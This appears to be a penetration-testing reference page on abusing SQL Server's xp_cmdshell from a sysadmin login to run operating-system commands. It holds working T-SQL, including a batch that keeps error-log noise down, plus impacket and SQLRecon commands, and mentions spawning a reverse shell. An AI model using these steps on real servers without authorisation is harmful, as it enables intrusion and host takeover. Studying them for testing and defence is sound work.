Leverage xp_cmdshell Procedure
Vulnerability
If you are authenticated as a member of the sysadmin server role, you can enable the xp_cmdshell extended stored procedure and use it to execute operating system commands on the SQL Server host. Two things matter before doing so: the commands run in the security context of the SQL Server service account (a non-sysadmin caller, if permitted at all, runs under the configured xp_cmdshell proxy account instead), and every sp_configure change is written to the SQL Server error log, so the enable step leaves a trace.
Prerequisites
- Membership in the sysadmin server role on the Microsoft SQL Server instance (sp_configure requires ALTER SETTINGS, which sysadmin holds).
Exploit
To do it manually, run the following T-SQL statements against the instance.
-- This turns on advanced options and is needed to configure xp_cmdshell
EXEC sp_configure 'show advanced options', '1'
RECONFIGURE
-- This enables xp_cmdshell
EXEC sp_configure 'xp_cmdshell', '1'
RECONFIGURE
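The statements above are the two halves of the enable step. The following T-SQL batch is an added example, not code from the original page: it wraps the same enable step in a sysadmin check, records the configuration before touching it, runs one command while capturing its output into a temp table, and restores the previous state afterwards. The command `whoami` and the temp table name `#cmd_out` are arbitrary choices; any command and table name will do.

```sql
-- Added example (not from the original page): enable xp_cmdshell only if needed,
-- run one OS command, capture its output, then restore the original configuration.

-- 1. Confirm the prerequisite. IS_SRVROLEMEMBER returns NULL for an invalid
--    role or login, so treat NULL as "not a member".
IF ISNULL(IS_SRVROLEMEMBER('sysadmin'), 0) <> 1
BEGIN
    RAISERROR('Current login is not sysadmin; cannot enable xp_cmdshell.', 16, 1);
    RETURN;
END;

-- 2. Record the current values so they can be restored at the end.
DECLARE @adv_before INT = (SELECT CAST(value_in_use AS INT)
                           FROM sys.configurations
                           WHERE name = 'show advanced options');
DECLARE @xp_before  INT = (SELECT CAST(value_in_use AS INT)
                           FROM sys.configurations
                           WHERE name = 'xp_cmdshell');

-- 3. Enable only what is currently off. Each sp_configure change is logged
--    in the SQL Server error log, so skipping unnecessary changes reduces noise.
IF @adv_before = 0
BEGIN
    EXEC sp_configure 'show advanced options', 1;
    RECONFIGURE;
END;
IF @xp_before = 0
BEGIN
    EXEC sp_configure 'xp_cmdshell', 1;
    RECONFIGURE;
END;

-- 4. Run the OS command and capture its output line by line. It executes as the
--    SQL Server service account, so 'whoami' (arbitrary choice) shows the
--    privilege level every later command will have.
CREATE TABLE #cmd_out (line NVARCHAR(4000) NULL);
INSERT INTO #cmd_out (line) EXEC master.dbo.xp_cmdshell 'whoami';
SELECT line FROM #cmd_out WHERE line IS NOT NULL;
DROP TABLE #cmd_out;

-- 5. Put the configuration back the way it was found.
IF @xp_before = 0
BEGIN
    EXEC sp_configure 'xp_cmdshell', 0;
    RECONFIGURE;
END;
IF @adv_before = 0
BEGIN
    EXEC sp_configure 'show advanced options', 0;
    RECONFIGURE;
END;
```

Capturing output through INSERT ... EXEC rather than reading the result grid is what makes the command usable from tooling that only returns rows, and reading `value_in_use` before changing anything is what lets the batch leave an already-enabled instance untouched rather than disabling something the owner relies on.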
If you are connected with impacket-mssqlclient, you can use the built-in commands provided by the tool instead of typing the sp_configure statements yourself.
# This enables xp_cmdshell (the command issues sp_configure for you); RECONFIGURE applies the change.
enable_xp_cmdshell
RECONFIGURE
# Now you can use xp_cmdshell to enumerate the host or spawn a reverse shell.
xp_cmdshell $command
The tool also provides disable_xp_cmdshell to revert the setting when you are done.
Using SQLRecon, the same two steps map to the following modules.
# The i-prefixed modules run the operation while impersonating the user given with `/i:$domain\$username`.
./SQLRecon.exe /a:wintoken /h:$hostname,$port /m:ienablexp
./SQLRecon.exe /a:wintoken /h:$hostname,$port /m:ixpcmd /c:$command